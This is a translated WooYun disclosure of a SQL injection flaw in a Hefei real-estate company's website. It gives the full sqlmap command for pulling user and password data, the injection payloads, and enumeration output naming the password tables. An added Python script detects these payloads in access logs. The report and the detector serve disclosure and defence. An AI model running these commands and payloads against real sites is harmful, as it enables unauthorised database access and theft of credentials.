
Vulnerability summary

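Bug ID: wooyun-2015-0158886

Title: SQL injection vulnerability on the main site of Hefei Gaoxin Co., Ltd. (合肥高新股份有限公司) (large number of employee passwords)

Vendor: Hefei Gaoxin Co., Ltd. (合肥高新股份有限公司)

Author: 路人甲

Submitted: 2015-12-08 00:46

Fixed: 2016-01-23 15:16

Disclosed: 2016-01-23 15:16

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]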


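Vulnerability details

Disclosure status:

2015-12-08: Details reported to the vendor; awaiting vendor handling
2015-12-11: Vendor confirmed; details disclosed to the vendor only
2015-12-21: Details disclosed to core white hats and experts in related fields
2015-12-31: Details disclosed to regular white hats
2016-01-10: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public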

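Brief description:

Hefei Gaoxin Co., Ltd. was founded in December 2002 with registered capital of RMB 2.558 billion and holds a Class 1 real-estate development qualification. It is a leading industry-park real-estate enterprise in Anhui Province and a state-controlled company directly under the Hefei National High-tech Zone Administrative Committee. It currently engages mainly in the development, construction, financing, operation and management of industry-park, industrial, commercial and residential real estate, with projects covering property types such as industrial complexes, industrial parks, standardized factory buildings, headquarters economy, regional commercial centers and boutique residences.
With the mission of building platforms for innovation and entrepreneurship and cultivating competitive industry clusters, the company has developed and operates 11 industrial parks, including the Innovation Industrial Park, Mingzhu Industrial Park, Information Industrial Park, Science and Technology Industry Park, Electromechanical Industrial Park, Pilot-Test Science Park, Opto-Mechatronics Integration Park, Overseas Students Pioneer Park, New Materials Park and Creative Incubation Base, with a total operated area of 3 million square meters. It has brought in or cultivated more than 600 enterprises and formed more than 10 industry clusters, becoming an important platform and vehicle for Hefei's implementation of "mass entrepreneurship and innovation". At the same time, in keeping with its aim of being rooted in, building and serving the High-tech Zone, it has invested in and built commercial and residential projects such as Wangyuan Villas, Mengyuan Community, Zhongyang Huating, Heyi Garden, Changning Jiayuan and Shushan Xintiandi; resettlement housing communities such as Huandong Community, Xingyuan Community, Shunan Courtyard, Huimin New Village and Baiyan Yayuan; and public rental housing projects such as Chuangxin Apartments, Wanshui Apartments and Mingzhu Apartments, with a total floor area of about 2.6 million square meters, completing the urban supporting functions of the High-tech Zone. It undertook construction of the road network south of Huangshan Road and north of National Highway 312, and has completed and opened more than 20 main and secondary roads, including Wangjiang West Road (eastern section), Kexue Avenue, Xiangzhang Avenue, Yulan Avenue (southern section) and Fenglin Road, helping the built-up area of the High-tech Zone form a well-connected road network.
Building platforms for innovation and entrepreneurship, we vow to be a thoroughbred; cultivating distinctive industry clusters, we strive to lead the flock. With the care and support of friends from all walks of life, we will continue to uphold the business philosophy of "seeking development through entrepreneurship, building the brand through service, and surviving through profitability", build nests to attract phoenixes and build dreams for the future, and work to become a specialized industry-park real-estate operator with national influence.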

Detailed description:

URL: http://**.**.**.**/show.php?id=3&newsid=1280

$ python sqlmap.py -u "http://**.**.**.**/show.php?id=3&newsid=1280" -p newsid --technique=BE --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


Database: hfgx_new
Table: pcms_member
[27 entries]
Database: hfgx_new
Table: pcms_admin
[3 entries]

Proof of vulnerability:

---
Parameter: newsid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3&newsid=1280 AND 7652=7652
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: id=3&newsid=(SELECT 2716 FROM(SELECT COUNT(*),CONCAT(0x7162627671,(SELECT (ELT(2716=2716,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: FreeBSD
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL 5.0
current user: 'hfgx@localhost'
current user is DBA: False
database management system users [1]:
[*] 'hfgx'@'localhost'
Database: hfgx_new
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pcms_admin | 3 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 941 |
| SESSION_VARIABLES | 450 |
| GLOBAL_VARIABLES | 436 |
| GLOBAL_STATUS | 341 |
| SESSION_STATUS | 341 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |
| COLLATIONS | 219 |
| PARTITIONS | 94 |
| TABLES | 94 |
| STATISTICS | 48 |
| PLUGINS | 42 |
| CHARACTER_SETS | 40 |
| INNODB_FT_DEFAULT_STOPWORD | 36 |
| KEY_COLUMN_USAGE | 35 |
| TABLE_CONSTRAINTS | 35 |
| SCHEMA_PRIVILEGES | 14 |
| ENGINES | 9 |
| SCHEMATA | 2 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hfgx_new
Table: pcms_member
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
| randpass | varchar(32) |
+----------+--------------+
Database: hfgx_new
Table: pcms_admin
[2 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
| randpass | varchar(32) |
+----------+--------------+

Fix:

Deploy a WAF.

Copyright notice: when reposting, credit the source: 路人甲@乌云
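As an added example (not part of the original report or the vendor's response), the Python sketch below shows the check a request filter or a log review would apply to the `newsid` parameter: accept only a plain integer and classify anything else against the two techniques sqlmap lists in the proof section. The log lines are constructed, and the rule names and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; client addresses and timestamps are placeholders.
# The two payloads come from the proof section (the error-based one abbreviated).
SAMPLE_LOG = """\
192.0.2.10 - - [08/Dec/2015:00:40:01 +0800] "GET /show.php?id=3&newsid=1280 HTTP/1.1" 200 5120
192.0.2.77 - - [08/Dec/2015:00:41:12 +0800] "GET /show.php?id=3&newsid=1280%20AND%207652%3D7652 HTTP/1.1" 200 5120
192.0.2.77 - - [08/Dec/2015:00:41:13 +0800] "GET /show.php?id=3&newsid=%28SELECT%202716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162627671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 200 312
192.0.2.10 - - [08/Dec/2015:00:42:30 +0800] "GET /show.php?id=3&newsid=abc HTTP/1.1" 200 40
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
INTEGER = re.compile(r"\d{1,10}")

# Hypothetical rule names; each pattern covers one technique from the sqlmap output.
RULES = [
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(|information_schema", re.I)),
    ("boolean-based", re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I)),
]

def classify(value):
    """Return None for a plain integer id, else the name of the matching rule."""
    if INTEGER.fullmatch(value):
        return None
    for name, pattern in RULES:
        if pattern.search(value):
            return name
    return "non-numeric"

def scan(log_text, param="newsid"):
    """Return (client, verdict, decoded value) for every suspicious `param` value."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        # parse_qs percent-decodes the value, so encoded payloads are matched too.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for value in query.get(param, []):
            verdict = classify(value)
            if verdict:
                findings.append((client, verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer check belongs in `show.php` itself: a request filter is a compensating control, and the query still has to treat `newsid` as a bound integer.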


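Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-12-11 16:47

Vendor reply:

CNVD confirmed and reproduced the reported issue and has forwarded it via CNCERT to the Anhui branch center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None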